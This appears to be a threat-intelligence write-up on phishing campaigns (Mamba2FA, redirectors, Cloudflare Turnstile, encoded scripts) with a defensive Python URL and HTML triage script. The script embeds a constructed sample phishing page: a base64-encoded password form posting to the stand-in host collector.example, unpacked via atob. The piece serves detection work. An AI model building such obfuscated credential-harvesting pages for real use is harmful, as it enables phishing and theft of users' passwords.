# Unraveling Phishing Campaigns Flagged by Trustwave’s URL Scanner

In recent months, Trustwave SpiderLabs, a LevelBlue company, saw a significant increase in phishing URLs containing familiar patterns, similar phishing templates, and a resurgence in the use of email marketing platforms. The use of URL redirectors, along with the abuse of Amazon web hosting and Cloudflare services, was also widely observed.

## Analysis Summary
## Key Points
- Threat actors frequently compromise legitimate domains to avoid detection and deceive victims.
- Phishing pages are challenging to detect due to their constantly changing content and use of evasion methods like CAPTCHA and encoded scripts.
- Trustwave’s URL scanner effectively identifies threats using machine learning and domain expert rules.
## Threat Actors
- **Mamba2FA**: A phishing service used in conjunction with compromised domains and redirectors.
- No specific attribution available for the recent campaign.
## TTPs
- Compromised legitimate domains to avoid detection.
- Use of redirection techniques, including Cloudflare Turnstile.
- Employing evasion methods such as CAPTCHA and encoded scripts.
## Affected Systems
- The compromised legitimate domains are typically benign sites in industries unrelated to the lure, such as freight services.
## Mitigations
- Utilize machine learning and domain expert rules for URL scanning, as seen with Trustwave’s URL scanner.
- Implement robust security controls to prevent phishing attacks, including employee education and awareness programs.
- Regularly update and patch systems to avoid exploitation of known vulnerabilities.
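As an added illustration of the rule-based side of URL scanning mentioned in the mitigations (example code written for this page, not Trustwave's scanner, whose rules and model are not published here), the script below applies three defender-side checks that correspond to the TTPs listed above: a complete URL carried inside a query parameter or fragment (the redirector pattern), a landing page hosted under a shared cloud-hosting suffix (treated only as contextual signal, never as proof of abuse), and page content whose script is base64-encoded and unpacked at runtime behind a Cloudflare Turnstile widget. The hosting-suffix list, the rule weights, the sample URL and the sample HTML page are constructed assumptions; `challenges.cloudflare.com/turnstile` is the real path prefix of the Turnstile widget script.

```python
import base64
import re
from urllib.parse import parse_qsl, unquote, urlparse

# Constructed rule set for illustration (not Trustwave's scanner).
# Suffixes assumed to be shared cloud hosting: a contextual signal only.
SHARED_HOSTING_SUFFIXES = ("amazonaws.com", "pages.dev", "workers.dev")
TURNSTILE_MARKER = "challenges.cloudflare.com/turnstile"
NESTED_URL = re.compile(r"^https?://", re.I)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
DECODER_CALLS = re.compile(r"\b(atob|unescape|eval|String\.fromCharCode)\s*\(", re.I)
B64_BLOB = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")
RULE_WEIGHTS = {"nested_url": 2, "encoded_script": 3, "turnstile_gate": 1, "shared_hosting": 1}


def _is_shared_hosting(host):
    """True when the host is, or sits under, one of the assumed shared-hosting suffixes."""
    return any(host == s or host.endswith("." + s) for s in SHARED_HOSTING_SUFFIXES)


def _decode_b64(blob):
    """Strictly decode a base64 blob to text; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_url(url):
    """Return (rule, detail) hits for one URL: redirector pattern and hosting context."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    hits = []
    if _is_shared_hosting(host):
        hits.append(("shared_hosting", host))
    # Redirector pattern: a full URL carried in a query value or in the fragment.
    carriers = parse_qsl(parts.query, keep_blank_values=True) + [("#", parts.fragment)]
    for key, value in carriers:
        target = unquote(value)
        if NESTED_URL.match(target):
            hits.append(("nested_url", f"{key} -> {urlparse(target).hostname}"))
    return hits


def scan_html(html):
    """Return (rule, detail) hits for fetched page content: Turnstile gate, encoded scripts."""
    hits = []
    if TURNSTILE_MARKER in html:
        hits.append(("turnstile_gate", TURNSTILE_MARKER))
    for body in SCRIPT_BLOCK.findall(html):
        uses_decoder = bool(DECODER_CALLS.search(body))
        for blob in B64_BLOB.findall(body):
            decoded = _decode_b64(blob)
            if decoded is None:
                continue
            lowered = decoded.lower()
            # Flag a blob that is unpacked at runtime or that itself contains markup.
            if uses_decoder or "<script" in lowered or "<form" in lowered:
                hits.append(("encoded_script", decoded[:40]))
    return hits


def triage(url, html=""):
    """Combine URL and content hits into a weighted score and a coarse verdict."""
    hits = scan_url(url) + scan_html(html)
    score = sum(RULE_WEIGHTS[rule] for rule, _ in hits)
    return {"score": score, "verdict": "suspicious" if score >= 3 else "benign", "hits": hits}


# Constructed sample input: a redirector on an unrelated site pointing at a hosted landing page
# whose credential form is base64-encoded and written into the DOM behind a Turnstile widget.
SAMPLE_REDIRECT_URL = (
    "https://freight-shipper.example/redirect?url=https%3A%2F%2Fverify-account.pages.dev%2Flogin"
)
_PAYLOAD = '<form method="post" action="https://collector.example/login"><input name="password"></form>'
_ENCODED = base64.b64encode(_PAYLOAD.encode()).decode()
SAMPLE_HTML = f"""<html><head>
<script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>
</head><body>
<script>document.write(atob("{_ENCODED}"));</script>
</body></html>"""

if __name__ == "__main__":
    result = triage(SAMPLE_REDIRECT_URL, SAMPLE_HTML)
    print(result["verdict"], result["score"])
    for rule, detail in result["hits"]:
        print(f"  {rule}: {detail}")
```

The score threshold and weights are deliberately crude: in practice each rule would be one feature alongside a model's output, and the shared-hosting signal on its own should never drive a block, since the same providers host large volumes of legitimate traffic.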